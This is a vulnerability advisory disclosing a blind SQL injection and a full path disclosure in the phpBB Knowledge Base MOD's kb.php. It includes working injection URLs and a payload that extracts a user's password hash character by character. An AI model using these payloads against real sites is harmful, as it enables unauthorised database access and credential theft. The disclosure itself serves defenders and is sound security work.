phpBBkbmod.txt

`  
  
###########################################################  
# phpBB - Knowledge Base MOD #  
# SQL-Injection vulnerability and Full Path Disclosure #  
# #  
# Discovered by [R] and deluxe89 #  
###########################################################  
  
  
Discussion:  
The phpbb - Knowledge Base MOD has a relatively hard to exploit SQL-Injection vulnerability. However, an attacker can exploit this bug and receive informations from the database.  
  
  
  
The Bug:  
The script doesn't filter the cat variable.  
If we apply something wrong here:  
  
/kb.php?mode=cat&cat='  
  
We will get an error similar to this:  
  
Could not obtain category data  
DEBUG MODE  
SQL Error : 1064 You have an error in your SQL syntax  
SELECT * FROM phpbb_kb_categories WHERE category_id = \'  
Line : 131  
File : /here/is/the/full/path/functions_kb.php  
  
  
  
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0  
No match: Categorie doesn't exist.  
  
/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users  
Match: DEBUG MODE - SQL-Error  
  
Therefor the only thing an attacker can find out is whether a row is matched or not.  
  
  
  
Exploit:  
The attacker may compare the informations in the database with test values. Example:  
  
0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+user_id=2+AND+ascii(substring(user_password,1,1))=97  
  
If it returns an SQL-Error, the first character of the hash is an 'a'.  
Exploit available at the websites below.  
  
  
  
Patch:  
No patch available by now.  
  
  
  
Greetz to madinfect, reddi, darkkilla, EaTh, Astovidatu and Doc  
  
www.security-project.org  
www.batznet.com  
`